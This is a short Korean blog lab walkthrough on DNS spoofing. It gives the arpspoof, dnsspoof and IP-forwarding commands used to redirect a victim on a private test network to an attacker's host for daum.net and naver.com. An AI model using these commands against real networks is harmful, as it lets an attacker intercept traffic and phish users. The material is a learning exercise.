네트워크 해킹 - 06. DNS Spoofing
by jennysgapSpoofing
1. arpspoof L2 - 같은 네트워크망 안에서만 가능
2. ipspoofing L3 - smarf attack
3. TCP seg guess L4 - 어려움, 공격이 안 될 확률이 높음
4. App spoof L7 - DNS
DNS Spoofing
공격자 설정
1. Packet forwarding 설정
2. arpspoof 공격
3. dns fake site 구성(text 명시)
4. dnsspoof 공격
# echo 1 > /proc/sys/net/ipv4/ip_forward
# cat /proc/sys/net/ipv4/ip_forward
# arpspoof -t 192.168.3.82 192.168.3.1 (1번 명령창)
# vi /root/dnsspoof.txt (2번 명령창)
-------------------------------------------------------------------
192.168.3.245 www.daum.net
192.168.3.245 www.naver.com
-------------------------------------------------------------------
# dnsspoof -f /root/dnsspoof.txt
피해자
1. nslookup 사이트 검색
2. 변경 된 IP 주소 확인
<공격자>
<공격자> vi /root/dnsspoof.txt → 아래처럼 입력
<피해자> nslookup으로 확인
ipconfig/displaydns
ipconfig/flushdns
'BOX' 카테고리의 다른 글
| 네트워크 해킹 - 08. IP Spoofing [작업중] (0) | 2016.12.06 |
|---|---|
| 네트워크 해킹 - 07. TCP Sequence Guess[작업중] (0) | 2016.12.06 |
| 네트워크 해킹 - 05. Netbus (0) | 2016.12.06 |
| 네트워크 해킹 - 04. ARP Spoofing (0) | 2016.12.03 |
| 네트워크 해킹 - 03. nmap을 이용한 스캐닝 (0) | 2016.12.02 |
블로그의 정보
jennysgap
jennysgap